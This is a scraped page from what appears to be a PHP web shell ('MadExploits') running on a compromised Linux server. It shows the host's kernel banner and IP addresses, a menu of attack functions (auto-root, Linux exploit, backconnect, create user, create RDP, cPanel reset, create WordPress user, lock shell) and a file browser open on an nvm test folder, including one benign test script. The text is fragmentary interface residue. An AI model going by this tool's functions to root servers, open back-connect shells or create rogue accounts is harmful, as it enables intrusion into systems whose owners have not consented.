Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.117.111.63
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
nvm /
test /
slow /
nvm exec /
[ HOME SHELL ]
Name
Size
Permission
Action
Preamble works and respects "s...
1.24
KB
-rwxrwxr-x
Running "nvm exec --lts" shoul...
549
B
-rwxrwxr-x
Running "nvm exec 0.x" should ...
500
B
-rwxrwxr-x
Running "nvm exec" should pick...
506
B
-rwxrwxr-x
setup_dir
137
B
-rwxrwxr-x
teardown_dir
175
B
-rwxrwxr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Running "nvm exec --lts" should work
#!/bin/sh set -ex die () { echo "$@" ; exit 1; } \. ../../../nvm.sh nvm install --lts || die 'nvm install --lts failed' NPM_VERSION_LTS="$(npm --version)" TEST_STRING="foo bar" nvm use 1.0.0 && [ "$(node --version)" = "v1.0.0" ] || die "\`nvm use\` failed!" [ "$(nvm exec --lts npm --version | tail -1)" = "$NPM_VERSION_LTS" ] || die "`nvm exec` failed to run with the correct version" [ "$(nvm exec --lts bash -c "printf '$TEST_STRING'" | tail -1)" = "$TEST_STRING" ] || die "\`nvm exec\` failed to run with a command including whitespace"
Close